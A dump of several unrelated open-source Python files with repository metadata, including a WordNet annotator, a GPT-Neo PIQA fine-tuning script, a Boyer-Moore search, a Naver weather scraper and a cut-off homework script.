timestamp = datetime.now().strftime("%y%m%d%H%M%S")
self.meta["snapshot"] = timestamp
cwnio.ensure_dir("annot")
if with_timestamp:
cwnio.dump_annot_json(self.meta, self.V, self.E,
f"{CwnAnnotator.PREFIX}_{name}_{timestamp}.json")
else:
cwnio.dump_annot_json(self.meta, self.V, self.E,
f"{CwnAnnotator.PREFIX}_{name}.json")
def new_node_id(self):
serial = self.meta.get("serial", 0) + 1
session_name = self.meta.get("session_name", "")
self.meta["serial"] = serial
return f"{session_name}_{serial:06d}"
def create_lemma(self, lemma):
node_id = self.new_node_id()
new_lemma = CwnLemma(node_id, self)
new_lemma.lemma = lemma
self.set_lemma(new_lemma)
return new_lemma
def create_sense(self, definition):
node_id = self.new_node_id()
new_sense = CwnSense(node_id, self)
new_sense.definition = definition
self.set_sense(new_sense)
return new_sense
def create_relation(self, src_id, tgt_id, rel_type):
if not self.get_node_data(src_id):
raise ValueError(f"{src_id} not found")
if not self.get_node_data(tgt_id):
raise ValueError(f"{tgt_id} not found")
edge_id = (src_id, tgt_id)
new_rel = CwnRelation(edge_id, self)
new_rel.relation_type = rel_type
self.set_relation(new_rel)
return new_rel
def set_lemma(self, cwn_lemma):
self.V[cwn_lemma.id] = cwn_lemma.data()
def set_sense(self, cwn_sense):
self.V[cwn_sense.id] = cwn_sense.data()
def set_relation(self, cwn_relation):
self.E[cwn_relation.id] = cwn_relation.data()
def remove_lemma(self, cwn_lemma):
cwn_lemma.action = "delete"
self.set_lemma(cwn_lemma)
def remove_sense(self, cwn_sense):
cwn_sense.action = "delete"
self.set_sense(cwn_sense)
def remove_relation(self, cwn_relation):
cwn_relation.action = "delete"
self.set_relation(cwn_relation)
def find_glyph(self, instr):
return self.parent_cgu.find_glyph(instr)
def find_senses(self, lemma="", definition="", examples=""):
cgu = CwnGraphUtils(self.V, self.E)
senses = cgu.find_senses(lemma, definition, examples)
parent_senses = self.parent_cgu.find_senses(lemma, definition, examples)
ret = annot_merger.merge(senses, parent_senses, self)
return ret
def find_lemmas(self, instr_regex):
cgu = CwnGraphUtils(self.V, self.E)
lemmas = cgu.find_lemma(instr_regex)
parent_lemmas = self.parent_cgu.find_lemma(instr_regex)
ret = annot_merger.merge(lemmas, parent_lemmas, self)
return ret
def find_edges(self, node_id, is_directed = True):
cgu = CwnGraphUtils(self.V, self.E)
edges = cgu.find_edges(node_id, is_directed)
parent_edges = self.parent_cgu.find_edges(node_id, is_directed)
ret = annot_merger.merge(edges, parent_edges, self)
return ret
def get_node_data(self, node_id):
node_data = self.V.get(node_id, {})
if not node_data:
node_data = self.parent_cgu.get_node_data(node_id)
return node_data
def get_edge_data(self, edge_id):
edge_data = self.E.get(edge_id, {})
if not edge_data:
edge_data = self.parent_cgu.get_edge_data(edge_id)
return edge_data
def connected(self, node_id, is_directed = True, maxConn=100, sense_only=True):
raise NotImplementedError("connected() is not implemented in CwnAnnotator")
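# Minimal usage sketch (assumes an existing CwnGraph base image `cgu` exposing
# get_hash(); obtaining one is outside this module, and the relation type
# string below is illustrative):
#
#   annot = CwnAnnotator(cgu, "demo_session")
#   lemma = annot.create_lemma("電腦")
#   sense = annot.create_sense("an electronic computing device")
#   annot.create_relation(lemma.id, sense.id, "has_sense")
#   annot.save()  # writes annot/cwn_annot_demo_session.json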
| [
"[email protected]"
] | |
99c78b4857e3bb376f9341fe3607dec6bb56d5d2 | 85bfd24a172bb4b35ff373599fca4096c9c4c529 | /testinfra_tim/test_service.py | 0e7f0d3101898495b917efb0ccfa88dfcdce58d5 | [
"MIT"
] | permissive | scaleway/tim | 503a0e7726da8e97636a09e5dcaa792bbd701a48 | 6bfa6113fdd2b18b1facee47353643544457f1f4 | refs/heads/master | 2020-12-02T07:57:05.616645 | 2017-09-08T15:29:50 | 2017-09-08T15:39:15 | 96,750,851 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,419 | py | '''
Copyright (C) 2017 Scaleway. All rights reserved.
Use of this source code is governed by a MIT-style
license that can be found in the LICENSE file.
'''
from functools import reduce
from .tooling import yaml_params, listize, map_sum, params_warn
def _get_services(params, running=True, enabled=True):
"""
This generator yields services names and
expected states from an input tree.
"""
if isinstance(params, str):
yield (params, running, enabled)
elif isinstance(params, (list, tuple)):
for subparam in params:
yield from _get_services(subparam)
elif isinstance(params, dict):
running = params.pop('running', running)
enabled = params.pop('enabled', enabled)
get_name_attr = lambda name: listize(params.pop(name, []))
for subparam in map_sum(get_name_attr, ('name', 'names',)):
yield from _get_services(subparam, running, enabled)
params_warn(params)
else:
raise RuntimeError('service test takes a dict, list'
' or string as parameter')
@yaml_params
def test_service(host, params):
"""
Test the status of one or more services.
By default, services are required to be
enabled and running.
It is meant to be very flexible and should
accept any reasonable input.
It even features inheritance :)
You can use nested lists and dictionnaries
to list service names. The tested state of
the service is running and enabled by default.
This behavior can be changed using the
'running' and 'enabled' attributes of
dictionnarires. Child services are read
from the name and names keys.
Example:
>> - service:
>> names:
>> - running_enabled
>> - running_enabled
>> running: true
>> enabled: true
>>
>> - service:
>> - running_enabled
>> - running_enabled
>>
>> - service: running_enabled
>>
>> - service:
>> - names:
>> - stopped_disabled
>> - name: running_disabled
>> running: true
>> running: false
>> enabled: false
>> - running_enabled
"""
for name, running, enabled in _get_services(params):
service = host.service(name)
assert name and service.is_running == running
assert name and service.is_enabled == enabled
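# Illustrative expansion of the spec tree (service names invented, and assuming
# tooling.listize wraps a scalar into a one-element list):
#
#   >>> list(_get_services([{'name': 'nginx', 'enabled': False}, 'sshd']))
#   [('nginx', True, False), ('sshd', True, True)]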
| [
"[email protected]"
] | |
bd171b67cb9363e6bad907a04d5ab5e0bc909104 | c16d80fa4837ca849056dc1e66191825037969ed | /gptneo_piqa.py | d804ccdcc15115883cf1b8dceb7408a4520b8371 | [] | no_license | vivekvkashyap/gpt2-commonsens | c289819e440b52dfb7390c614494cd85437cd1c3 | f5d884bcf27c2bd2cb3cf8fa55f6151d12e17b9d | refs/heads/main | 2023-06-25T17:37:08.203910 | 2021-07-27T05:06:33 | 2021-07-27T05:06:33 | 389,845,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,707 | py | import jax
print(jax.local_device_count())
import jax.numpy as jnp
import flax
import flax.linen as nn
from flax.training.common_utils import get_metrics,onehot,shard,shard_prng_key
from flax.training import train_state
from flax.metrics.tensorboard import SummaryWriter
from flax.training import checkpoints
from datasets import load_dataset,load_metric
from transformers import GPT2Tokenizer
from tqdm import tqdm
import logging
import optax
import math
from pathlib import Path
from typing import Callable
from itertools import chain
from flax.metrics import tensorboard
from datasets import load_dataset,load_metric
from transformers import GPTNeoConfig,GPT2Tokenizer
from model_file import FlaxGPTNeoForMultipleChoice
logger = logging.getLogger()
logger.setLevel(logging.INFO)
tokenizer=GPT2Tokenizer.from_pretrained('EleutherAI/gpt-neo-1.3B',pad_token='<|endoftext|>')
dataset=load_dataset('piqa')
num_choices=2
def preprocess(example):
example['first_sentence']=[example['goal']]*num_choices
example['second_sentence']=[example[f'sol{i}'] for i in [1,2]]
return example
train_dataset=dataset['train'].map(preprocess)
validation_dataset=dataset['validation'].map(preprocess)
test_dataset=dataset['test'].map(preprocess)
len_train_dataset=16113
len_validation_dataset=1838
len_test_dataset=3084
train_dataset=train_dataset.select(range(len_train_dataset))
test_dataset=test_dataset.select(range(len_test_dataset))
validation_dataset=validation_dataset.select(range(len_validation_dataset))
remove_col=train_dataset.column_names
def tokenize(examples):
tokenized_examples=tokenizer(examples['first_sentence'],examples['second_sentence'],padding='max_length',truncation=True,max_length=256,return_tensors='jax')
tokenized_examples['labels']=int(examples['label'])
return tokenized_examples
train_dataset=train_dataset.map(tokenize)
validation_dataset=validation_dataset.map(tokenize)
train_dataset=train_dataset.remove_columns(remove_col)
validation_dataset=validation_dataset.remove_columns(remove_col)
test_dataset=test_dataset.remove_columns(remove_col)
per_device_batch_size=4
seed=0
num_train_epochs=3
learning_rate=2e-5
model = FlaxGPTNeoForMultipleChoice.from_pretrained('EleutherAI/gpt-neo-1.3B',input_shape=(1,num_choices,1))
total_batch_size = per_device_batch_size * jax.local_device_count()
print('The overall batch size (both for training and eval) is', total_batch_size)
num_train_steps = len(train_dataset) // total_batch_size * num_train_epochs
num_validation_steps=len(validation_dataset)//total_batch_size*num_train_epochs
learning_rate_function = optax.linear_schedule(init_value=learning_rate, end_value=0, transition_steps=num_train_steps)
class TrainState(train_state.TrainState):
logits_function:Callable=flax.struct.field(pytree_node=False)
loss_function:Callable=flax.struct.field(pytree_node=False)
def adamw(weight_decay):
return optax.adafactor(learning_rate=learning_rate_function)
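# NB: despite its name, adamw() returns an Adafactor transform and ignores the
# weight_decay argument, so the two masked branches chained below behave identically.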
decay_path=lambda p:not any(x in p for x in ['bias','LayerNorm.weight'])
def traverse(function):
def mask(data):
flat=flax.traverse_util.flatten_dict(data)
return flax.traverse_util.unflatten_dict({k:function(k,v) for k,v in flat.items()})
return mask
gradient_transformation=optax.chain(
optax.masked(adamw(0.0),mask=traverse(lambda path,_:decay_path(path))),
optax.masked(adamw(0.01),mask=traverse(lambda path,_:not decay_path(path))))
def loss_function(logits,labels):
logits=flax.linen.log_softmax(logits)
xentropy=optax.softmax_cross_entropy(logits,onehot(labels,num_classes=num_choices))
return jnp.mean(xentropy)
def eval_function(logits):
return logits.argmax(-1)
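# Illustrative sanity check for loss_function (toy numbers, not from the data):
# logits have shape (batch, num_choices), labels are integer choice indices, e.g.
#   toy_logits = jnp.array([[2.0, 0.5], [0.1, 1.2]])
#   toy_labels = jnp.array([0, 1])
#   loss_function(toy_logits, toy_labels)  # -> scalar mean cross-entropy
# Note: the log_softmax above is redundant but harmless, since log_softmax is
# idempotent and optax.softmax_cross_entropy normalizes its input internally.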
state=TrainState.create(apply_fn=model.__call__,
params=model.params,
tx=gradient_transformation,
logits_function=eval_function,
loss_function=loss_function)
def train_step(state,batch,dropout_rng):
targets=batch.pop("labels")
dropout_rng,new_dropout_rng=jax.random.split(dropout_rng)
def loss_function(params):
logits=state.apply_fn(**batch,params=params,dropout_rng=dropout_rng,train=True)[0]
loss=state.loss_function(logits,targets)
return loss
grad_function=jax.value_and_grad(loss_function)
loss,grad=grad_function(state.params)
grad=jax.lax.pmean(grad,"batch")
new_state=state.apply_gradients(grads=grad)
#Added.
logits=new_state.apply_fn(**batch,params=new_state.params,dropout_rng=dropout_rng,train=True)[0]
accuracy=jnp.equal(jnp.argmax(logits,axis=-1),targets)
metrics=jax.lax.pmean({"loss":loss,"learning_rate":learning_rate_function(state.step),'accuracy':accuracy},axis_name="batch")
return new_state,metrics,new_dropout_rng
parallel_train_step = jax.pmap(train_step, axis_name="batch", donate_argnums=(0,))
def eval_step(state, batch):
targets=batch.pop('labels')
logits = state.apply_fn(**batch, params=state.params, train=False)[0]  # [0] extracts logits, matching train_step
loss=state.loss_function(logits,targets)
predictions=state.logits_function(logits)
eval_accuracy=jnp.equal(predictions,targets)
#eval_acc=jnp.equal(predictions,targets)
metrics=jax.lax.pmean({"loss":loss,'accuracy':eval_accuracy},axis_name="batch")
#return state.logits_function(logits) #(8,4)
return targets,predictions,metrics
parallel_eval_step = jax.pmap(eval_step, axis_name="batch")
def glue_train_data_loader(rng,dataset,batch_size):
steps_per_epoch=len_train_dataset//batch_size
perms=jax.random.permutation(rng,len_train_dataset)
perms=perms[:steps_per_epoch*batch_size]
perms=perms.reshape((steps_per_epoch,batch_size))
for perm in perms:
batch=dataset[perm]
#print(jnp.array(batch['label']))
batch={k:jnp.array(v) for k,v in batch.items()}
batch=shard(batch)
yield batch
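# Batching arithmetic (illustrative; assumes 8 local devices, e.g. a TPU v3-8):
# total_batch_size = 4 * 8 = 32, steps_per_epoch = 16113 // 32 = 503, and the
# trailing 16113 - 503 * 32 = 17 examples are dropped each epoch by the slice above.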
rng=jax.random.PRNGKey(seed)
dropout_rngs=jax.random.split(rng,jax.local_device_count())
def glue_eval_data_loader(dataset, batch_size):
for i in range(len_validation_dataset // batch_size):
batch = dataset[i * batch_size : (i + 1) * batch_size]
batch = {k: jnp.array(v) for k, v in batch.items()}
batch = shard(batch)
yield batch
state = flax.jax_utils.replicate(state)
actual_task = "mnli"
metric = load_metric('glue', "mnli")
actual_taskmetric = load_metric('glue', actual_task)
workdir='./piqa_tensorboard'
summary_writer = tensorboard.SummaryWriter(workdir)
logger.info(f"***** Running training *****")
logger.info(f" Num examples = {len_train_dataset}")
logger.info(f" Num Epochs = {num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {per_device_batch_size}")
logger.info(f" Total train batch size = {total_batch_size}")
logger.info(f" Total optimization steps = {num_train_steps}")
for i, epoch in enumerate(tqdm(range(1, num_train_epochs+1), desc=f"Epoch ...", position=0, leave=True)):
rng, input_rng = jax.random.split(rng)
train_acc_metrics=[]
train_loss_metrics=[]
eval_acc_metrics=[]
eval_loss_metrics=[]
# train
with tqdm(total=len_train_dataset // total_batch_size, desc="Training...", leave=False) as progress_bar_train:
for idx,batch in enumerate(glue_train_data_loader(input_rng, train_dataset, total_batch_size)):
state, train_metric, dropout_rngs = parallel_train_step(state, batch, dropout_rngs)
train_acc_metrics.append(jax.device_get(train_metric['accuracy']).mean().item())
train_loss_metrics.append(flax.jax_utils.unreplicate(train_metric)['loss'].item())
if idx%5==0:
summary_writer.scalar('train_loss',flax.jax_utils.unreplicate(train_metric)['loss'].item(),idx)
summary_writer.scalar('train_accuracy', jax.device_get(train_metric['accuracy']).mean().item(),idx)
if idx%20==0:
logger.info(f"train_step_loss{idx}: {flax.jax_utils.unreplicate(train_metric)['loss'].item()} train_step_acc{idx}: {jax.device_get(train_metric['accuracy']).mean().item()} ")
progress_bar_train.update(1)
# evaluate
with tqdm(total=len_validation_dataset // total_batch_size, desc="Evaluating...", leave=False) as progress_bar_eval:
for idx,batch in enumerate(glue_eval_data_loader(validation_dataset, total_batch_size)):
labels,predictions,eval_metric=parallel_eval_step(state, batch)
eval_acc_metrics.append(jax.device_get(eval_metric['accuracy']).mean().item())
eval_loss_metrics.append(flax.jax_utils.unreplicate(eval_metric)['loss'].item())
progress_bar_eval.update(1)
if idx%5==0:
logger.info(f"eval_step_loss {idx} : {flax.jax_utils.unreplicate(eval_metric)['loss'].item()} eval_step_acc {idx} : {jax.device_get(eval_metric['accuracy']).mean().item()}")
summary_writer.scalar('eval_loss : ', flax.jax_utils.unreplicate(eval_metric)['loss'].item(),idx)
summary_writer.scalar('eval_accuracy : ', jax.device_get(eval_metric['accuracy']).mean().item(),idx)
logger.info(f"---------------------Epoch {epoch} done-----------------")
logger.info(f"Train loss: {jax.device_get(jnp.array(train_loss_metrics)).mean().item()} Train accuracy: {jax.device_get(jnp.array(train_acc_metrics)).mean().item()}")
logger.info(f"Eval loss: {jax.device_get(jnp.array(eval_loss_metrics)).mean().item()} Eval accuracy: {jax.device_get(jnp.array(eval_acc_metrics)).mean().item()}")
if jax.process_index() == 0:
params = jax.device_get(jax.tree_map(lambda x: x[0], state.params))
model.save_pretrained(
'./',
params=params,
push_to_hub=True,
commit_message=f"Piqa:Saving weights of epoch {epoch} at step {idx}",)
summary_writer.flush()
| [
"[email protected]"
] | |
60a6d3c470672d39fae27e61c518fbf33c37c655 | 0d2a66d7f04c11f7ac655ffeee855def9f3b406d | /setup.py | d70de94d5c6d3ccc808c1c53110d146da07a1559 | [] | no_license | lmbeccaria/python_network_tests | dd7d46850d0a440d95c36edbab78c94d3263f10a | 18b0ba47399abd2f4aa736c1bc9095d90f3c5339 | refs/heads/master | 2016-09-16T04:23:00.752284 | 2014-08-07T01:32:05 | 2014-08-07T01:32:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description':'Network Tests',
'author':'Luis B',
'url': 'URL to get it at.',
'download_url': 'Where to download it.',
'author_email': '[email protected]',
'version': '0.1',
'install_requires': ['nose'],
'packages': ['network_connection'],
'scripts': [],
'name': 'network_connection'
}
setup(**config)
| [
"monkeyboy@intiwasi.(none)"
] | monkeyboy@intiwasi.(none) |
57592e74791a7c3a6e0010ee1083835391f9c27f | 530ce8ce026cf0ed96184e0739fa5fd109dd0b76 | /ENotePadAlgorithm/strFind/boyerMoore.py | a115e4e07f743af7eea5f1ea3974edd50d020901 | [
"MIT"
] | permissive | xioacd99/EnhancedNotePad | 0c41eb64dc4ddb57975d521a6320414d0ed0f0fd | b95da1c4d957061ad60015f3b9ab5c445b5a1bc4 | refs/heads/main | 2023-07-13T13:47:50.804090 | 2021-08-25T15:53:55 | 2021-08-25T15:53:55 | 388,513,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,319 | py | import os
# import time only for performance test
import time
# word-ending punctuation / word separators
wordSplit = [',', '.', ':', '"', ",", '\n', ' ', '?', '!', '(', ')',
',', '。', '‘', '‘', '“', '”', '?', '!', '(', ')']
class BoyerMoore(object):
def __init__(self):
super(BoyerMoore, self).__init__()
self.badCharTable = {}
self.goodSuffixTable = {}
def getBadCharTable(self, word):
# find positions every char
charLocations = {}
matcherLen = len(word)
for i in range(matcherLen):
currentChar = word[i]
locations = []
if currentChar in charLocations:
locations = charLocations[currentChar]
locations.append(i)
charLocations[currentChar] = locations
# build badCharTable
self.badCharTable = {}
for i in range(matcherLen, 0, -1):
for charTmp in charLocations.keys():
innerResult = {}
if charTmp in self.badCharTable:
innerResult = self.badCharTable[charTmp]
locationsTmp = charLocations[charTmp]
finded = False
for j in range(len(locationsTmp), 0, -1):
locationTmp = locationsTmp[j - 1]
if locationTmp <= i - 1:
innerResult[str(i - 1)] = locationTmp
finded = True
break
if finded == False:
innerResult[str(i - 1)] = -1
self.badCharTable[charTmp] = innerResult
def badCharOffset(self, char, pos):
if char in self.badCharTable:
innerLocationTable = self.badCharTable[char]
return pos - innerLocationTable[str(pos)]
else:
return pos + 1
def getGoodSuffixTable(self, matcher):
self.goodSuffixTable = {}
matcherLen = len(matcher)
for i in range(matcherLen, 1, -1):
tmpSuffix = matcher[i - 1: matcherLen]
tmpSuffixLen = len(tmpSuffix)
finded = False
locationTmp = matcherLen - tmpSuffixLen - 1
while True:
if locationTmp <= 0 - tmpSuffixLen:
break
matchedThisTime = True
for j in range(0, tmpSuffixLen, 1):
if locationTmp + j < 0:
continue
if tmpSuffix[j] != matcher[locationTmp + j]:
matchedThisTime = False
if matchedThisTime == True:
finded = True
break
locationTmp = locationTmp - 1
if finded == True:
self.goodSuffixTable[tmpSuffix] = i - 1 - locationTmp
else:
self.goodSuffixTable[tmpSuffix] = matcherLen
def goodSuffixOffset(self, matchedPart):
if matchedPart == None or len(matchedPart) == 0:
return 0
return self.goodSuffixTable[matchedPart]
def strFind(self, source, target, pos=0, fullWord=True, caseSensitive=True):
sLen = len(source)
tLen = len(target)
# if either string is empty, or the pattern is longer than the text, nothing can match
if (sLen == 0 or tLen == 0) or tLen > sLen:
return []
# case-insensitive: lowercase both strings
if not caseSensitive:
source = source.lower()
target = target.lower()
idx = []
self.getBadCharTable(target)
self.getGoodSuffixTable(target)
while pos + tLen <= sLen:
isFind = True
step = tLen
matchedPart = ""
for i in range(tLen, 0, -1):
curChar = source[pos + i - 1]
currentMatcherChar = target[i - 1]
if curChar != currentMatcherChar:
offsetOfBadChar = self.badCharOffset(curChar, i - 1)
offsetOfGoodSuffix = self.goodSuffixOffset(matchedPart)
step = max(offsetOfBadChar, offsetOfGoodSuffix)
isFind = False
break
else:
matchedPart = curChar + matchedPart
if isFind:
step = 1
wordStart = pos
# full-word match: scan to the next separator (end of string counts as a boundary)
if fullWord:
wordEnd = pos
while wordEnd < sLen:
if source[wordEnd] in wordSplit:
break
else:
wordEnd += 1
if wordEnd - wordStart == len(target):
idx.append(wordStart)
else:
idx.append(wordStart)
pos += step
return idx
def fileFind(self, filename, target):
results = []
if os.path.exists(filename):
lineNum = 1
with open(filename, 'r', encoding='utf-8') as file:
line = file.readline()
while line:
idx = self.strFind(line, target)
if idx:
for pos in idx:
results.append([lineNum, pos])
# alternative output format kept from algorithm testing
'''
singleResult = 'The ' + target + ' occurs ' + str(len(idx)) + ' times in line ' + str(
lineNum) + ', which positions are '
for pos in idx:
singleResult += '(' + str(lineNum) + ', ' + str(pos) + ') '
results.append(singleResult)
'''
line = file.readline()
lineNum += 1
else:
with open(filename, 'w', encoding='utf-8') as file:
print('Create a new file named %s' % filename)
return results
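# Quick illustration of strFind() (inputs invented; positions are 0-based):
#
#   bm = BoyerMoore()
#   bm.strFind('say hello, hello!', 'hello')   # -> [4, 11]
#   bm.strFind('say hellos, hello!', 'hello')  # -> [12] (fullWord filters 'hellos')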
if __name__ == '__main__':
start = time.time()
# write your test code
test = BoyerMoore()
ans = test.fileFind(
'F:\\.vscode\\Github\\EnhancedNotePad\\ENotePadAlgorithm\\algorithmTestData\\BigTest.txt', 'be')
# end
end = time.time()
print('using time: %s seconds' % (end - start))
| [
"[email protected]"
] | |
4716976f68bf061fef859306dd4192440aa5d090 | 94312b972c9ea96404535d26a297c72e75f84d22 | /Weather_WebCrawl.py | 350443ebd66136fe19578ad51278528825577cdc | [] | no_license | 1LuvCode/My_Slut_TJ | 2e8092d78857497a45a22d4af2270dc4c51cdada | d7f39542cccb51b46d4d53d6489ef3b82079bc4d | refs/heads/main | 2023-02-25T20:16:32.461565 | 2021-02-02T11:28:37 | 2021-02-02T11:28:37 | 335,256,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,695 | py | import requests
from bs4 import BeautifulSoup
def Crawling_Weather(Finallocation):
url = 'https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=1&ie=utf8&query=' + Finallocation
hdr = {'User-Agent': (
'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/78.0.3904.70 safari/537.36')}
req = requests.get(url, headers=hdr)
html = req.text
soup = BeautifulSoup(html, 'html.parser')
LocationInfo = ""
NowTemp = ""
CheckDust = []
# error check
ErrorCheck = soup.find('span', {'class': 'btn_select'})
if 'None' in str(ErrorCheck):
print("Error! 지역 검색 오류!")
return None
else:
# region info
for i in soup.select('span[class=btn_select]'):
LocationInfo = i.text
# current temperature
NowTemp = soup.find('span', {'class': 'todaytemp'}).text + soup.find('span', {'class': 'tempmark'}).text[2:]
# weather summary text
WeatherCast = soup.find('p', {'class': 'cast_txt'}).text
# today's morning temp, afternoon temp, and feels-like temp
TodayMorningTemp = soup.find('span', {'class': 'min'}).text
TodayAfternoonTemp = soup.find('span', {'class': 'max'}).text
TodayFeelTemp = soup.find('span', {'class': 'sensible'}).text[5:]
# UV index
TodayUV = soup.find('span', {'class': 'indicator'}).text[4:-2] + " " + soup.find('span',
{'class': 'indicator'}).text[-2:]
# fine dust, ultrafine dust, and ozone levels
CheckDust1 = soup.find('div', {'class': 'sub_info'})
CheckDust2 = CheckDust1.find('div', {'class': 'detail_box'})
for i in CheckDust2.select('dd'):
CheckDust.append(i.text)
FineDust = CheckDust[0][:-2] + " " + CheckDust[0][-2:]
UltraFineDust = CheckDust[1][:-2] + " " + CheckDust[1][-2:]
Ozon = CheckDust[2][:-2] + " " + CheckDust[2][-2:]
# tomorrow's morning/afternoon temperatures and conditions
tomorrowArea = soup.find('div', {'class': 'tomorrow_area'})
tomorrowCheck = tomorrowArea.find_all('div', {'class': 'main_info morning_box'})
# tomorrow morning temperature
tomorrowMoring1 = tomorrowCheck[0].find('span', {'class': 'todaytemp'}).text
tomorrowMoring2 = tomorrowCheck[0].find('span', {'class': 'tempmark'}).text[2:]
tomorrowMoring = tomorrowMoring1 + tomorrowMoring2
# tomorrow morning conditions
tomorrowMState1 = tomorrowCheck[0].find('div', {'class': 'info_data'})
tomorrowMState2 = tomorrowMState1.find('ul', {'class': 'info_list'})
tomorrowMState3 = tomorrowMState2.find('p', {'class': 'cast_txt'}).text
tomorrowMState4 = tomorrowMState2.find('div', {'class': 'detail_box'})
tomorrowMState5 = tomorrowMState4.find('span').text.strip()
tomorrowMState = tomorrowMState3 + " " + tomorrowMState5
# tomorrow afternoon temperature
tomorrowAfter1 = tomorrowCheck[1].find('p', {'class': 'info_temperature'})
tomorrowAfter2 = tomorrowAfter1.find('span', {'class': 'todaytemp'}).text
tomorrowAfter3 = tomorrowAfter1.find('span', {'class': 'tempmark'}).text[2:]
tomorrowAfter = tomorrowAfter2 + tomorrowAfter3
# tomorrow afternoon conditions
tomorrowAState1 = tomorrowCheck[1].find('div', {'class': 'info_data'})
tomorrowAState2 = tomorrowAState1.find('ul', {'class': 'info_list'})
tomorrowAState3 = tomorrowAState2.find('p', {'class': 'cast_txt'}).text
tomorrowAState4 = tomorrowAState2.find('div', {'class': 'detail_box'})
tomorrowAState5 = tomorrowAState4.find('span').text.strip()
tomorrowAState = tomorrowAState3 + " " + tomorrowAState5
Weather_info_dict = {
'지역':LocationInfo,
'현재온도':NowTemp,
'체감온도':TodayFeelTemp,
'오전온도':TodayMorningTemp,
'오후온도':TodayAfternoonTemp,
'현재상태':WeatherCast,
'현재자외선지수':TodayUV,
'현재미세먼지농도':FineDust,
'현재초미세먼지농도':UltraFineDust,
'현재오존지수':Ozon,
'내일오전온도':tomorrowMoring,
'내일오전상태':tomorrowMState,
'내일오후온도':tomorrowAfter,
'내일오후상태':tomorrowAState
}
return Weather_info_dict
# print("=========================================")
# print(LocationInfo + " 날씨 정보입니다.")
# print("=========================================")
# print("현재온도: " + NowTemp)
# print("체감온도: " + TodayFeelTemp)
# print("오전/오후 온도: " + TodayMorningTemp + "/" + TodayAfternoonTemp)
# print("현재 상태: " + WeatherCast)
# print("현재 자외선 지수: " + TodayUV)
# print("현재 미세먼지 농도: " + FineDust)
# print("현재 초미세먼지 농도: " + UltraFineDust)
# print("현재 오존 지수: " + Ozon)
# print("=========================================")
# print(LocationInfo + " 내일 날씨 정보입니다.")
# print("=========================================")
# print("내일 오전 온도: " + tomorrowMoring)
# print("내일 오전 상태: " + tomorrowMState)
# print("내일 오후 온도: " + tomorrowAfter)
# print("내일 오후 상태: " + tomorrowAState)
| [
"[email protected]"
] | |
707062ffa62600fed5892717cfc5efb6677b3277 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_plough.py | 8524ffbb0f26cf406e78e16dbed5ed7ccee77fc1 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py |
#calss header
class _PLOUGH():
def __init__(self,):
self.name = "PLOUGH"
self.definitions = [u'a large farming tool with blades that digs the soil in fields so that seeds can be planted', u'If land is under the plough, crops are grown on it: ']
self.parents = []
self.children = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
] | |
3a7f9382b72dd52806311d2bed487a411dca70e4 | 1c4309daf6e53cc3cdf7dc9074cbb94d2dc7c15b | /digital/trend/trend/wsgi.py | a9ca274a90cc165c19e43f4a454b1df36ea19a5c | [] | no_license | OBAMARIE13/digital-trend | be55827e398dffcead4345eed8af40abaa059077 | 07113e987163050cb94b022e85428bdfd673dd25 | refs/heads/main | 2023-05-11T11:26:50.344084 | 2021-05-31T17:04:22 | 2021-05-31T17:04:22 | 372,575,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
WSGI config for trend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'trend.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
0d45b58ea30bf2d1410cade9e95116631c1f3d7b | 79dc13c4b3a6d7cf2ab53312e95493d57d99f8a6 | /hw4/all_copied_features2 | 76911544a27ec4eccfcaafb70bd8a42d29505018 | [] | no_license | vrobison/sp2015.11-731 | 311198e35f069f5f22dc7ee3abf2e98749215be8 | 972f3b5292c41f81b12b0c2364a2936b78c55390 | refs/heads/master | 2021-01-17T23:55:05.067828 | 2015-05-08T15:03:34 | 2015-05-08T15:03:34 | 29,400,593 | 0 | 0 | null | 2015-01-17T18:14:08 | 2015-01-17T18:14:07 | Python | UTF-8 | Python | false | false | 11,771 | #!/usr/bin/env python
import sys
import argparse
import numpy as np
from scipy.sparse import csr_matrix
import random
from collections import defaultdict
from utils import read_ttable
def dot(f, w):
s = 0.0
for k in f.keys():
s += f[k] * w[wvocabulary[k]]
return s
def updatew(wi,xcy,ynot):
#x,prev,next,y,origfeats
a = 0.0001
dLdw = {}
dLdw[xcy[1]] = -1.0
dLdw[xcy[2]] = -1.0
dLdw[ynot[1]] = 1.0
dLdw[ynot[2]] = 1.0
for f in ynot[4].keys():
dLdw[f] = ynot[4][f] - xcy[4][f]
for i in range(5,len(xcy)):
if xcy[i] != ynot[i]:
dLdw[xcy[i]] = -1.0
dLdw[ynot[i]] = 1.0
adLdw = {}
for i in dLdw.keys():
adLdw[i] = a*dLdw[i]
wiplus = wi
for k in adLdw.keys():
wiplus[wvocabulary[k]] = (wi[wvocabulary[k]] - adLdw[k])
return wiplus
def L(xcy,ynot,g):
#xcy: (x,prev,next,y*,feats)
#ynot: (x,prev,next,y-,feats2)
#0.000005 0.387528 #1->0.390202
#indexes in w of form f1,f2,f3,f4,x_y_cleft, x_y_cright
#for ynot in fxcynot: #for each wrong y
diff = {}
#prev& next
diff[xcy[1]] = 1.0
diff[xcy[2]] = 1.0
diff[ynot[1]] = -1.0
diff[ynot[2]] = -1.0
